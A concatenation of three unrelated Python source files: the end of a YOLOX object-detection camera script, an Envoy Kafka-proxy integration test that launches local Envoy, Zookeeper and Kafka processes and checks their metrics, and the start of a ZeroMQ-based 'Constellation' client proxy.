outputs = outputs[0].cpu().numpy()
outputs[:, 0:4] /= ratio
else:
outputs = []
return outputs
class listString(str):
def __init__(self, this_string: str = ''):
super(listString, self).__init__()
self.__this_string = this_string
# self.__all__ = ['append', ]
def __getitem__(self, index):
return self.__this_string[index]
def __repr__(self):
return self.__this_string
def __len__(self):
return len(self.__this_string)
def append(self, add_string):
self.__this_string += add_string
class Detector(object):
__model_size_all = ['s', 'm', 'l', 'x', 'tiny', 'nano', 'v3']
__device = 'cpu'
__model = None  # model
__model_size = None  # model size (s, m, l, x, tiny, nano, v3)
__model_path = None  # model weight file path
__class_names = COCO_CLASSES  # class names
__detector = None  # predictor
__exp = None
__fp16 = False
__fuse = False
__useTRT = False  # use TensorRT
__legacy = False  # To be compatible with older versions
__auto_choose_device = True
__tsize = 640
__conf = 0.25
__nms = 0.5
__result = None
__img_info = None
def __init__(
self,
model_path: str or None = None,  # model weight file path
model_size: str or None = None,  # model size (s, m, l, x, tiny, ...)
class_path: str or None = None,  # path to the class names file
conf: float or None = None,  # confidence threshold
nms: float or None = None,  # NMS (non-maximum suppression) threshold
autoChooseDevice: bool = True,  # automatically choose the device (CPU/GPU)
):
self.__model_path = model_path
self.__model_size = model_size
self.__auto_choose_device = autoChooseDevice
self.reloadModel = self.loadModel
if class_path is not None:
self.__load_class(class_path)
if conf is not None:
self.__conf = conf
if nms is not None:
self.__nms = nms
self.__check_input()
# self.
#######################################################################################################
# private function
def __load_class(self, path):
if os.path.exists(path):
data = open(path).readlines()
classes = []
[classes.append(this_class[:-1] if this_class.endswith('\n') else this_class)
if len(this_class) else None
for this_class in data]
self.__class_names = classes
def __check_input(self):
if self.__model_path is not None:
this_error = '[model path input error]: Type of model path should be "string"!'
assert type(self.__model_path) == str, this_error
# print(self.__model_path)
assert self.__model_path.endswith('.pth'), '[model path type error]:not a weight file'
if self.__model_size is not None:
allSizeStr = listString('[model size input error]: Available model sizes: ')
[allSizeStr.append('%s, ' % this_size) for this_size in self.__model_size_all]
assert self.__model_size in self.__model_size_all, '%s' % allSizeStr
def __cuda(self):
assert torch.cuda.is_available()
assert self.__model is not None
self.__model.cuda()
if self.__fp16:
self.__model.half()
self.__model.eval()
def __cpu(self):
assert self.__model is not None
self.__model.cpu()
self.__model.eval()
#######################################################################################################
# public function
def get_all_classes(self):
return self.__class_names
################################################################################
"""
you can use the following setting functions only before loading model, or you should reload model
"""
def setModelPath(self, model_path: str) -> None:
self.__model_path = model_path
self.__check_input()
def setModelSize(self, model_size: str) -> None:
self.__model_size = model_size
self.__check_input()
def setClassPath(self, class_path: str) -> None:
self.__load_class(class_path)
def setAutoChooseDevice(self, flag: bool) -> None:
self.__auto_choose_device = flag
def setFuse(self, flag: bool) -> None:
self.__fuse = flag
def setLegacy(self, flag: bool) -> None:
self.__legacy = flag
def setDevice(self, device: str) -> None:
assert device in ['cpu', 'gpu'], '[Device name error]: No device named %s' % device
self.__device = device
def setTsize(self, size: int) -> None:
self.__tsize = size
def setUseTRT(self, flag:bool):
self.__useTRT = flag
def setFp16(self, flag:bool):
self.__fp16 = flag
################################################################################
"""
you can use the following setting functions after loading model
"""
def setConf(self, conf: float) -> None:
self.__conf = conf
if self.__detector is not None:
self.__detector.confthre = conf
def setNms(self, nms: float) -> None:
self.__nms = nms
if self.__detector is not None:
self.__detector.nmsthre = nms
################################################################################
def loadModel(self) -> None:
assert self.__model_size is not None, 'model size not declared'
assert self.__model_path is not None, 'model path not declared'
# build the network structure
self.__exp = yolox.exp.build.get_exp_by_name('yolox-%s' % self.__model_size)
self.__exp.test_conf = self.__conf
self.__exp.nmsthre = self.__nms
self.__exp.test_size = (self.__tsize, self.__tsize)
self.__exp.num_classes = len(self.__class_names)
self.__model = self.__exp.get_model()
if self.__auto_choose_device:
if torch.cuda.is_available():
self.__cuda()
else:
self.__cpu()
else:
if self.__device == 'cpu':
self.__cpu()
elif torch.cuda.is_available():
self.__cuda()
else:
print('cuda is not available, use cpu')
self.__cpu()
trt_file = None
decoder = None
if not self.__useTRT:
# load the weights
pt = torch.load(self.__model_path, map_location="cpu")
# for name in pt:
# print(name)
pt['classes'] = self.__class_names
self.__model.load_state_dict(pt["model"])
if self.__fuse:
self.__model = fuse_model(self.__model)
else:
trt_file = self.__model_path
self.__model.head.decode_in_inference = False
decoder = self.__model.head.decode_outputs
# build the predictor
self.__detector = Predictor(
self.__model,
self.__exp,
self.__class_names,
trt_file,
decoder,
self.__device,
self.__fp16,
self.__legacy,
)
def predict(self, image):
if self.__detector is None:
self.loadModel()
# run inference
image_use = image.copy()
self.__result = self.__detector.inference(image_use)
return self.__result
file_settings = None
if os.path.isfile('./detect_settings.yaml'):
file_settings = yaml.load(open('./detect_settings.yaml'), yaml.Loader)
confidence_thres = file_settings['confidence_thres'] if file_settings is not None else 0.4
nms_thres = file_settings['nms_thres'] if file_settings is not None else 0.5
device = file_settings['device'] if file_settings is not None else 'gpu'
input_size = file_settings['input_size'] if file_settings is not None else 640
auto_choose_device = file_settings['auto_choose_device'] if file_settings is not None else True
weight_size = file_settings['weight_size'] if file_settings is not None else 's'
model_path = file_settings['model_path'] if file_settings is not None else './best.pth'
is_trt_file = file_settings['is_trt_file'] if file_settings is not None else False
fp16 = file_settings['fp16'] if file_settings is not None else False
classes_file = file_settings['classes_file'] if file_settings is not None else 'coco_classes.txt'
source = file_settings['source'] if file_settings is not None else 0
source_type = file_settings['source_type'] if file_settings is not None else 'cam'
save_image = file_settings['save_image'] if file_settings is not None else False
show_image = file_settings['show_image'] if file_settings is not None else True
start_with_pause = int(file_settings['start_with_pause'] if file_settings is not None else False)
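# Illustrative detect_settings.yaml matching the defaults above (the file is optional;
# the values shown are simply the fallbacks used when it is absent):
#
#   confidence_thres: 0.4
#   nms_thres: 0.5
#   device: gpu
#   input_size: 640
#   auto_choose_device: true
#   weight_size: s
#   model_path: ./best.pth
#   is_trt_file: false
#   fp16: false
#   classes_file: coco_classes.txt
#   source: 0
#   source_type: cam
#   save_image: false
#   show_image: true
#   start_with_pause: false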
parse = make_parser().parse_args()
source = int(parse.source) if str(parse.source).isdigit() else parse.source  # default may already be an int (camera index)
source_type = parse.source_type
start_with_pause = parse.pause
# print(parse)
def detect(my_dict):
from time import time
weight_type = weight_size
detector = Detector(
model_path=model_path,
model_size=weight_type,
class_path=classes_file,
conf=confidence_thres,
nms=nms_thres,
autoChooseDevice=auto_choose_device
)
"""
Before running loadModel, you can change params by using the following functions.
You can also create a Detector without any params like this:
detector = Detector()
and then input params by using these functions.
"""
# detector.setConf(0.4)
# detector.setNms(0.5)
detector.setDevice(device)
detector.setTsize(input_size)
detector.setUseTRT(is_trt_file)
detector.setFp16(fp16)
# detector.setAutoChooseDevice(True)
# detector.setModelPath('weights/yolox_s.pth')
"""
Then load model, it will take some time, Never forget this step!!!
"""
detector.loadModel()
"""
Start Detection
"""
my_dict['classes'] = detector.get_all_classes()
my_dict['run'] = True
while my_dict['run']:  # while the program should keep running
if my_dict['updated']:  # if a new frame is available
img = my_dict['img']  # grab the frame
my_dict['updated'] = False  # mark the frame as consumed
t0 = time()  # start timing
result = detector.predict(img)  # run inference
my_dict['pre_fps'] = 1. / (time() - t0)  # stop timing and compute inference FPS
my_dict['result'] = result  # store the result
my_dict['update_result'] = True  # mark the result as updated
def show(my_dict):
from time import time, strftime, localtime
if source_type in ['cam', 'vid']:
cam = cv2.VideoCapture(source)
elif source_type in ['image_dir', 'image']:
cam = DirCapture(str(source))
else:
print('wrong source type')
cam = DirCapture()
fpss = []
result = []
time_delay = 1 - start_with_pause
print('wait for model-loading')
while not my_dict['run']:
pass
t0 = time()
while cam.isOpened():
t1 = time()
success, frame = cam.read()
if success:
# frame = cv2.resize(frame, (210 * 6, 90 * 6))
my_dict['img'] = frame
my_dict['updated'] = True
fpss.append((1 / (time() - t0)))
if len(fpss) > 10:
fpss = fpss[1:]
now_mean_fps = sum(fpss) / len(fpss)
print('\rdisplay FPS=%.2f, inference FPS=%.2f' % (now_mean_fps, my_dict['pre_fps']), end='')
t0 = time()
if my_dict['update_result']:
result = my_dict['result']
my_dict['update_result'] = False
if len(result):
draw_bb(frame, result, my_dict['classes'])
if save_image:
img_name = strftime("%Y_%m_%d_%H_%M_%S.jpg", localtime())
cv2.imwrite(img_name, frame)
cv2.imshow('yolox detect', frame) if show_image else None
key = cv2.waitKey(time_delay)
if key == 27:
cv2.destroyAllWindows()
break
elif key == ord(' '):
time_delay = 1 - time_delay
else:
break
while not time() - t1 >= 0.03:
pass
print('')
my_dict['run'] = False
cv2.destroyAllWindows()
def single():
import time
weight_type = weight_size
detector = Detector(
model_path=model_path,
model_size=weight_type,
class_path=classes_file,
conf=confidence_thres,
nms=nms_thres,
autoChooseDevice=auto_choose_device
)
detector.setDevice(device)
detector.setTsize(input_size)
detector.setUseTRT(is_trt_file)
detector.setFp16(fp16)
detector.loadModel()
#########################################################################################################
if source_type in ['cam', 'vid']:
cap = cv2.VideoCapture(source)
elif source_type in ['image_dir', 'image']:
cap = DirCapture(str(source))
else:
print('wrong source type')
cap = DirCapture()
#########################################################################################################
t0 = time.time()
wait_time = 1 - start_with_pause
while cap.isOpened():
ret, frame = cap.read()
if ret:
t1 = time.time()
frame = cv2.resize(frame, (1920 + 1280, 1080 + 720))
results = detector.predict(frame)
draw_bb(frame, results, detector.get_all_classes())
print('\rdisplay FPS=%.2f, inference FPS=%.2f' % ((1 / (time.time() - t0)), (1 / (time.time() - t1))), end='')
t0 = time.time()
if show_image:
cv2.imshow('results', frame)
if save_image:
img_name = time.strftime("%Y_%m_%d_%H_%M_%S.jpg", time.localtime())
cv2.imwrite(img_name, frame)
key = cv2.waitKey(wait_time)
if key == 27:
cap.release()
cv2.destroyAllWindows()
break
elif key == ord(' '):
wait_time = 1 - wait_time
print('')
def multi():
print('starting multiprocess')
from multiprocessing import Process, Manager, freeze_support
freeze_support()
d = Manager().dict()
d['run'] = False
d['updated'] = False
d['img'] = None
d['result'] = []
d['pre_fps'] = 0
d['classes'] = []
d['update_result'] = False
processes = [Process(target=show, args=(d,)),
Process(target=detect, args=(d,))]
[process.start() for process in processes]
[process.join() for process in processes]
if __name__ == '__main__':
multi() if parse.multi else single()
|
kafka_broker_integration_test.py
|
#!/usr/bin/python
import random
import os
import shutil
import socket
import subprocess
import tempfile
from threading import Thread, Semaphore
import time
import unittest
from kafka import KafkaAdminClient, KafkaConsumer, KafkaProducer, TopicPartition
from kafka.admin import ConfigResource, ConfigResourceType, NewPartitions, NewTopic
import urllib.request
class KafkaBrokerIntegrationTest(unittest.TestCase):
"""
All tests in this class depend on Envoy/Zookeeper/Kafka running.
For each of these tests we are going to create Kafka consumers/producers/admins and point them
to Envoy (that proxies Kafka).
We expect every operation to succeed (as they should reach Kafka) and the corresponding metrics
to increase on Envoy side (to show that messages were received and forwarded successfully).
"""
services = None
@classmethod
def setUpClass(cls):
KafkaBrokerIntegrationTest.services = ServicesHolder()
KafkaBrokerIntegrationTest.services.start()
@classmethod
def tearDownClass(cls):
KafkaBrokerIntegrationTest.services.shut_down()
def setUp(self):
# We want to check if our services are okay before running any kind of test.
KafkaBrokerIntegrationTest.services.check_state()
self.metrics = MetricsHolder(self)
def tearDown(self):
# We want to check if our services are okay after running any test.
KafkaBrokerIntegrationTest.services.check_state()
@classmethod
def kafka_address(cls):
return '127.0.0.1:%s' % KafkaBrokerIntegrationTest.services.kafka_envoy_port
@classmethod
def envoy_stats_address(cls):
return 'http://127.0.0.1:%s/stats' % KafkaBrokerIntegrationTest.services.envoy_monitoring_port
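# Sketch of how the stats endpoint above can be scraped (the real helper,
# MetricsHolder.get_envoy_stats(), is defined outside this excerpt; the parsing
# shown here is an assumption about Envoy's plain-text /stats output):
#
#   with urllib.request.urlopen(KafkaBrokerIntegrationTest.envoy_stats_address()) as response:
#       for line in response.read().decode().splitlines():
#           name, _, value = line.partition(': ')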
def test_kafka_consumer_with_no_messages_received(self):
"""
This test verifies that consumer sends fetches correctly, and receives nothing.
"""
consumer = KafkaConsumer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address(),
fetch_max_wait_ms=500)
consumer.assign([TopicPartition('test_kafka_consumer_with_no_messages_received', 0)])
for _ in range(10):
records = consumer.poll(timeout_ms=1000)
self.assertEqual(len(records), 0)
self.metrics.collect_final_metrics()
# 'consumer.poll()' can translate into 0 or more fetch requests.
# We have set API timeout to 1000ms, while fetch_max_wait is 500ms.
# This means that consumer will send roughly 2 (1000/500) requests per API call (so 20 total).
# So increase of 10 (half of that value) should be safe enough to test.
self.metrics.assert_metric_increase('fetch', 10)
# Metadata is used by consumer to figure out current partition leader.
self.metrics.assert_metric_increase('metadata', 1)
def test_kafka_producer_and_consumer(self):
"""
This test verifies that producer can send messages, and consumer can receive them.
"""
messages_to_send = 100
partition = TopicPartition('test_kafka_producer_and_consumer', 0)
producer = KafkaProducer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address())
for _ in range(messages_to_send):
future = producer.send(value=b'some_message_bytes',
topic=partition.topic,
partition=partition.partition)
send_status = future.get()
self.assertTrue(send_status.offset >= 0)
consumer = KafkaConsumer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address(),
auto_offset_reset='earliest',
fetch_max_bytes=100)
consumer.assign([partition])
received_messages = []
while (len(received_messages) < messages_to_send):
poll_result = consumer.poll(timeout_ms=1000)
received_messages += poll_result[partition]
self.metrics.collect_final_metrics()
self.metrics.assert_metric_increase('metadata', 2)
self.metrics.assert_metric_increase('produce', 100)
# 'fetch_max_bytes' was set to a very low value, so client will need to send a FetchRequest
# multiple times to broker to get all 100 messages (otherwise all 100 records could have been
# received in one go).
self.metrics.assert_metric_increase('fetch', 20)
# Both producer & consumer had to fetch cluster metadata.
self.metrics.assert_metric_increase('metadata', 2)
def test_consumer_with_consumer_groups(self):
"""
This test verifies that multiple consumers can form a Kafka consumer group.
"""
consumer_count = 10
consumers = []
for id in range(consumer_count):
consumer = KafkaConsumer(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address(),
group_id='test',
client_id='test-%s' % id)
consumer.subscribe(['test_consumer_with_consumer_groups'])
consumers.append(consumer)
worker_threads = []
for consumer in consumers:
thread = Thread(target=KafkaBrokerIntegrationTest.worker, args=(consumer,))
thread.start()
worker_threads.append(thread)
for thread in worker_threads:
thread.join()
for consumer in consumers:
consumer.close()
self.metrics.collect_final_metrics()
self.metrics.assert_metric_increase('api_versions', consumer_count)
self.metrics.assert_metric_increase('metadata', consumer_count)
self.metrics.assert_metric_increase('join_group', consumer_count)
self.metrics.assert_metric_increase('find_coordinator', consumer_count)
self.metrics.assert_metric_increase('leave_group', consumer_count)
@staticmethod
def worker(consumer):
"""
Worker thread for Kafka consumer.
    Multiple polls are done here, so that the group can safely form.
"""
poll_operations = 10
for i in range(poll_operations):
consumer.poll(timeout_ms=1000)
def test_admin_client(self):
"""
This test verifies that Kafka Admin Client can still be used to manage Kafka.
"""
admin_client = KafkaAdminClient(bootstrap_servers=KafkaBrokerIntegrationTest.kafka_address())
# Create a topic with 3 partitions.
new_topic_spec = NewTopic(name='test_admin_client', num_partitions=3, replication_factor=1)
create_response = admin_client.create_topics([new_topic_spec])
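    # Each 'topic_errors' entry is a (topic, error_code, error_message) tuple; code 0 / message None means success.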
error_data = create_response.topic_errors
self.assertEqual(len(error_data), 1)
self.assertEqual(error_data[0], (new_topic_spec.name, 0, None))
# Alter topic (change some Kafka-level property).
config_resource = ConfigResource(ConfigResourceType.TOPIC, new_topic_spec.name,
{'flush.messages': 42})
alter_response = admin_client.alter_configs([config_resource])
error_data = alter_response.resources
self.assertEqual(len(error_data), 1)
self.assertEqual(error_data[0][0], 0)
# Add 2 more partitions to topic.
new_partitions_spec = {new_topic_spec.name: NewPartitions(5)}
new_partitions_response = admin_client.create_partitions(new_partitions_spec)
    error_data = new_partitions_response.topic_errors
self.assertEqual(len(error_data), 1)
self.assertEqual(error_data[0], (new_topic_spec.name, 0, None))
# Delete a topic.
delete_response = admin_client.delete_topics([new_topic_spec.name])
    error_data = delete_response.topic_error_codes
    self.assertEqual(len(error_data), 1)
    self.assertEqual(error_data[0], (new_topic_spec.name, 0))
self.metrics.collect_final_metrics()
self.metrics.assert_metric_increase('create_topics', 1)
self.metrics.assert_metric_increase('alter_configs', 1)
self.metrics.assert_metric_increase('create_partitions', 1)
self.metrics.assert_metric_increase('delete_topics', 1)
class MetricsHolder:
"""
Utility for storing Envoy metrics.
  Expected to be created before the test (to capture the initial metrics) and used to collect them
  again at the end of the test, so that the expected increases can be verified.
"""
def __init__(self, owner):
self.owner = owner
    self.initial_requests, self.initial_responses = MetricsHolder.get_envoy_stats()
self.final_requests = None
self.final_responses = None
def collect_final_metrics(self):
self.final_requests, self.final_responses = MetricsHolder.get_envoy_stats()
def assert_metric_increase(self, message_type, count):
request_type = message_type + '_request'
response_type = message_type + '_response'
initial_request_value = self.initial_requests.get(request_type, 0)
final_request_value = self.final_requests.get(request_type, 0)
self.owner.assertGreaterEqual(final_request_value, initial_request_value + count)
    initial_response_value = self.initial_responses.get(response_type, 0)
final_response_value = self.final_responses.get(response_type, 0)
self.owner.assertGreaterEqual(final_response_value, initial_response_value + count)
@staticmethod
def get_envoy_stats():
"""
Grab request/response metrics from envoy's stats interface.
"""
stats_url = KafkaBrokerIntegrationTest.envoy_stats_address()
requests = {}
responses = {}
with urllib.request.urlopen(stats_url) as remote_metrics_url:
payload = remote_metrics_url.read().decode()
lines = payload.splitlines()
for line in lines:
request_prefix = 'kafka.testfilter.request.'
response_prefix = 'kafka.testfilter.response.'
if line.startswith(request_prefix):
data = line[len(request_prefix):].split(': ')
requests[data[0]] = int(data[1])
if line.startswith(response_prefix) and '_response:' in line:
data = line[len(response_prefix):].split(': ')
responses[data[0]] = int(data[1])
return [requests, responses]
class ServicesHolder:
"""
Utility class for setting up our external dependencies: Envoy, Zookeeper & Kafka.
"""
def __init__(self):
self.kafka_tmp_dir = None
self.envoy_worker = None
self.zk_worker = None
self.kafka_worker = None
@staticmethod
def get_random_listener_port():
"""
    Here we count on the OS to give us a random free port.
    Obviously this method needs to be invoked in a retry loop anyway, as in a degenerate scenario
    someone else might bind to the port after we have closed the socket and before the service
    that is supposed to use it binds to it.
"""
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
server_socket.bind(('0.0.0.0', 0))
socket_port = server_socket.getsockname()[1]
print('returning %s' % socket_port)
return socket_port
def start(self):
"""
Starts all the services we need for integration tests.
"""
# Find java installation that we are going to use to start Zookeeper & Kafka.
java_directory = ServicesHolder.find_java()
launcher_environment = os.environ.copy()
# Make `java` visible to build script:
# https://github.com/apache/kafka/blob/2.2.0/bin/kafka-run-class.sh#L226
new_path = os.path.abspath(java_directory) + os.pathsep + launcher_environment['PATH']
launcher_environment['PATH'] = new_path
# Both ZK & Kafka use Kafka launcher script.
# By default it sets up JMX options:
# https://github.com/apache/kafka/blob/2.2.0/bin/kafka-run-class.sh#L167
# But that forces the JVM to load file that is not present due to:
# https://docs.oracle.com/javase/9/management/monitoring-and-management-using-jmx-technology.htm
# Let's make it simple and just disable JMX.
launcher_environment['KAFKA_JMX_OPTS'] = ' '
# Setup a temporary directory, which will be used by Kafka & Zookeeper servers.
self.kafka_tmp_dir = tempfile.mkdtemp()
print('Temporary directory used for tests: ' + self.kafka_tmp_dir)
# This directory will store the configuration files fed to services.
config_dir = self.kafka_tmp_dir + '/config'
os.mkdir(config_dir)
# This directory will store Zookeeper's data (== Kafka server metadata).
zookeeper_store_dir = self.kafka_tmp_dir + '/zookeeper_data'
os.mkdir(zookeeper_store_dir)
# This directory will store Kafka's data (== partitions).
kafka_store_dir = self.kafka_tmp_dir + '/kafka_data'
os.mkdir(kafka_store_dir)
# Find the Kafka server 'bin' directory.
kafka_bin_dir = os.path.join('.', 'external', 'kafka_server_binary', 'bin')
# Main initialization block:
# - generate random ports,
# - render configuration with these ports,
# - start services and check if they are running okay,
# - if anything is having problems, kill everything and start again.
while True:
# Generate random ports.
zk_port = ServicesHolder.get_random_listener_port()
kafka_real_port = ServicesHolder.get_random_listener_port()
kafka_envoy_port = ServicesHolder.get_random_listener_port()
envoy_monitoring_port = ServicesHolder.get_random_listener_port()
# These ports need to be exposed to tests.
self.kafka_envoy_port = kafka_envoy_port
self.envoy_monitoring_port = envoy_monitoring_port
# Render config file for Envoy.
template = RenderingHelper.get_template('envoy_config_yaml.j2')
contents = template.render(
data={
'kafka_real_port': kafka_real_port,
'kafka_envoy_port': kafka_envoy_port,
'envoy_monitoring_port': envoy_monitoring_port
})
envoy_config_file = os.path.join(config_dir, 'envoy_config.yaml')
with open(envoy_config_file, 'w') as fd:
fd.write(contents)
print('Envoy config file rendered at: ' + envoy_config_file)
# Render config file for Zookeeper.
template = RenderingHelper.get_template('zookeeper_properties.j2')
contents = template.render(data={'data_dir': zookeeper_store_dir, 'zk_port': zk_port})
zookeeper_config_file = os.path.join(config_dir, 'zookeeper.properties')
with open(zookeeper_config_file, 'w') as fd:
fd.write(contents)
print('Zookeeper config file rendered at: ' + zookeeper_config_file)
# Render config file for Kafka.
template = RenderingHelper.get_template('kafka_server_properties.j2')
contents = template.render(
data={
'data_dir': kafka_store_dir,
'zk_port': zk_port,
'kafka_real_port': kafka_real_port,
'kafka_envoy_port': kafka_envoy_port
})
kafka_config_file = os.path.join(config_dir, 'kafka_server.properties')
with open(kafka_config_file, 'w') as fd:
fd.write(contents)
print('Kafka config file rendered at: ' + kafka_config_file)
# Start the services now.
try:
# Start Envoy in the background, pointing to rendered config file.
envoy_binary = ServicesHolder.find_envoy()
# --base-id is added to allow multiple Envoy instances to run at the same time.
envoy_args = [
os.path.abspath(envoy_binary), '-c', envoy_config_file, '--base-id',
str(random.randint(1, 999999))
]
envoy_handle = subprocess.Popen(envoy_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.envoy_worker = ProcessWorker(envoy_handle, 'Envoy', 'starting main dispatch loop')
self.envoy_worker.await_startup()
# Start Zookeeper in background, pointing to rendered config file.
zk_binary = os.path.join(kafka_bin_dir, 'zookeeper-server-start.sh')
zk_args = [os.path.abspath(zk_binary), zookeeper_config_file]
zk_handle = subprocess.Popen(zk_args,
env=launcher_environment,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.zk_worker = ProcessWorker(zk_handle, 'Zookeeper', 'binding to port')
self.zk_worker.await_startup()
# Start Kafka in background, pointing to rendered config file.
kafka_binary = os.path.join(kafka_bin_dir, 'kafka-server-start.sh')
kafka_args = [os.path.abspath(kafka_binary), kafka_config_file]
kafka_handle = subprocess.Popen(kafka_args,
env=launcher_environment,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.kafka_worker = ProcessWorker(kafka_handle, 'Kafka', '[KafkaServer id=0] started')
self.kafka_worker.await_startup()
# All services have started without problems - now we can finally finish.
break
except Exception as e:
print('Could not start services, will try again', e)
if self.kafka_worker:
self.kafka_worker.kill()
self.kafka_worker = None
if self.zk_worker:
self.zk_worker.kill()
self.zk_worker = None
if self.envoy_worker:
self.envoy_worker.kill()
self.envoy_worker = None
@staticmethod
def find_java():
"""
This method just locates the Java installation in current directory.
We cannot hardcode the name, as the dirname changes as per:
https://github.com/bazelbuild/bazel/blob/master/tools/jdk/BUILD#L491
"""
external_dir = os.path.join('.', 'external')
for directory in os.listdir(external_dir):
if 'remotejdk11' in directory:
result = os.path.join(external_dir, directory, 'bin')
print('Using Java: ' + result)
return result
raise Exception('Could not find Java in: ' + external_dir)
@staticmethod
def find_envoy():
"""
This method locates envoy binary.
It's present at ./source/exe/envoy-static (at least for mac/bazel-asan/bazel-tsan),
or at ./external/envoy/source/exe/envoy-static (for bazel-compile_time_options).
"""
candidate = os.path.join('.', 'source', 'exe', 'envoy-static')
if os.path.isfile(candidate):
return candidate
candidate = os.path.join('.', 'external', 'envoy', 'source', 'exe', 'envoy-static')
if os.path.isfile(candidate):
return candidate
raise Exception("Could not find Envoy")
def shut_down(self):
# Teardown - kill Kafka, Zookeeper, and Envoy. Then delete their data directory.
print('Cleaning up')
if self.kafka_worker:
self.kafka_worker.kill()
if self.zk_worker:
self.zk_worker.kill()
if self.envoy_worker:
self.envoy_worker.kill()
if self.kafka_tmp_dir:
print('Removing temporary directory: ' + self.kafka_tmp_dir)
shutil.rmtree(self.kafka_tmp_dir)
def check_state(self):
self.envoy_worker.check_state()
self.zk_worker.check_state()
self.kafka_worker.check_state()
class ProcessWorker:
"""
Helper class that wraps the external service process.
  Provides the ability to wait until the service is ready to use (detected by watching its logs) and
  prints the service's output to stdout.
"""
# Service is considered to be properly initialized after it has logged its startup message
# and has been alive for INITIALIZATION_WAIT_SECONDS after that message has been seen.
# This (clunky) design is needed because Zookeeper happens to log "binding to port" and then
# might fail to bind.
INITIALIZATION_WAIT_SECONDS = 3
def __init__(self, process_handle, name, startup_message):
# Handle to process and pretty name.
self.process_handle = process_handle
self.name = name
self.startup_message = startup_message
self.startup_message_ts = None
# Semaphore raised when startup has finished and information regarding startup's success.
self.initialization_semaphore = Semaphore(value=0)
self.initialization_ok = False
self.state_worker = Thread(target=ProcessWorker.initialization_worker, args=(self,))
self.state_worker.start()
self.out_worker = Thread(target=ProcessWorker.pipe_handler,
args=(self, self.process_handle.stdout, 'out'))
self.out_worker.start()
self.err_worker = Thread(target=ProcessWorker.pipe_handler,
args=(self, self.process_handle.stderr, 'err'))
self.err_worker.start()
@staticmethod
def initialization_worker(owner):
"""
Worker thread.
    Responsible for detecting whether the service died during initialization and for checking whether
    enough time has passed since the startup message was seen.
When either of these happens, we just raise the initialization semaphore.
"""
while True:
status = owner.process_handle.poll()
if status:
# Service died.
print('%s did not initialize properly - finished with: %s' % (owner.name, status))
owner.initialization_ok = False
owner.initialization_semaphore.release()
break
else:
# Service is still running.
startup_message_ts = owner.startup_message_ts
if startup_message_ts:
# The log message has been registered (by pipe_handler thread), let's just ensure that
# some time has passed and mark the service as running.
current_time = int(round(time.time()))
if current_time - startup_message_ts >= ProcessWorker.INITIALIZATION_WAIT_SECONDS:
print('Startup message seen %s seconds ago, and service is still running' %
(ProcessWorker.INITIALIZATION_WAIT_SECONDS),
flush=True)
owner.initialization_ok = True
owner.initialization_semaphore.release()
break
time.sleep(1)
print('Initialization worker for %s has finished' % (owner.name))
@staticmethod
def pipe_handler(owner, pipe, pipe_name):
"""
Worker thread.
If a service startup message is seen, then it just registers the timestamp of its appearance.
Also prints every received message.
"""
try:
for raw_line in pipe:
line = raw_line.decode().rstrip()
print('%s(%s):' % (owner.name, pipe_name), line, flush=True)
if owner.startup_message in line:
print('%s initialization message [%s] has been logged' %
(owner.name, owner.startup_message))
owner.startup_message_ts = int(round(time.time()))
finally:
pipe.close()
print('Pipe handler for %s(%s) has finished' % (owner.name, pipe_name))
def await_startup(self):
"""
Awaits on initialization semaphore, and then verifies the initialization state.
If everything is okay, we just continue (we can use the service), otherwise throw.
"""
print('Waiting for %s to start...' % (self.name))
self.initialization_semaphore.acquire()
try:
if self.initialization_ok:
print('Service %s started successfully' % (self.name))
else:
raise Exception('%s could not start' % (self.name))
finally:
self.initialization_semaphore.release()
def check_state(self):
"""
Verifies if the service is still running. Throws if it is not.
"""
status = self.process_handle.poll()
if status:
raise Exception('%s died with: %s' % (self.name, str(status)))
def kill(self):
"""
Utility method to kill the main service thread and all related workers.
"""
print('Stopping service %s' % self.name)
# Kill the real process.
self.process_handle.kill()
self.process_handle.wait()
# The sub-workers are going to finish on their own, as they will detect main thread dying
# (through pipes closing, or .poll() returning a non-null value).
self.state_worker.join()
self.out_worker.join()
self.err_worker.join()
print('Service %s has been stopped' % self.name)
class RenderingHelper:
"""
Helper for jinja templates.
"""
@staticmethod
def get_template(template):
import jinja2
import os
import sys
# Templates are resolved relatively to main start script, due to main & test templates being
# stored in different directories.
env = jinja2.Environment(loader=jinja2.FileSystemLoader(
searchpath=os.path.dirname(os.path.abspath(__file__))))
return env.get_template(template)
if __name__ == '__main__':
unittest.main()
|
Constellation.py
|
# Constellation Python proxy
# Version: 1.8.0.16091 (31 Mar 2016)
# (c) 2015-2016 Sebastien.warin.fr
import inspect, json, sys, time, uuid, zmq
from collections import namedtuple
from enum import Enum
from threading import Thread
reload(sys)
sys.setdefaultencoding("utf-8")
class MessageScope(Enum):
none = 0
group = 1
package = 2
sentinel = 3
others = 4
all = 5
global IsRunning
global Settings
global OnExitCallback
global OnConnectionChanged
global OnLastStateObjectsReceived
global HasControlManager
global IsConnected
global IsStandAlone
global SentinelName
global PackageName
global PackageInstanceName
global PackageVersion
global PackageAssemblyVersion
global ConstellationClientVersion
global LastStateObjects
IsRunning = False
Settings = None
OnExitCallback = None
OnConnectionChanged = None
OnLastStateObjectsReceived = None
HasControlManager = None
IsConnected = None
IsStandAlone = None
SentinelName = None
PackageName = None
PackageInstanceName = None
PackageVersion = None
PackageAssemblyVersion = None
ConstellationClientVersion = None
LastStateObjects = None
_messageCallbacks = []
_stateObjectCallbacks = []
_messageCallbacksList = {}
_stateObjectCallbacksList = {}
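# ZeroMQ PAIR socket towards the Constellation host process; the TCP port to connect to is passed as the first argument.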
_ctx = zmq.Context()
_socket = _ctx.socket(zmq.PAIR)
_socket.connect("tcp://127.0.0.1:" + str(int(sys.argv[1])))
time.sleep(1.0)
_poller = zmq.Poller()
_poller.register(_socket, zmq.POLLIN)
_socket.send_string("Init")
def ConvertJsonToObject(data, tupleName = 'X', onTupleCreated = None):
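    # Deserialize JSON (a dict or a string) into nested namedtuples, so that fields can be accessed as attributes.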
def _json_object_hook(d):
tuple = namedtuple(tupleName, d.keys())
if onTupleCreated:
onTupleCreated(tuple)
return tuple(*d.values())
return json.loads(json.dumps(data) if isinstance(data, dict) else data, object_hook=_json_object_hook)
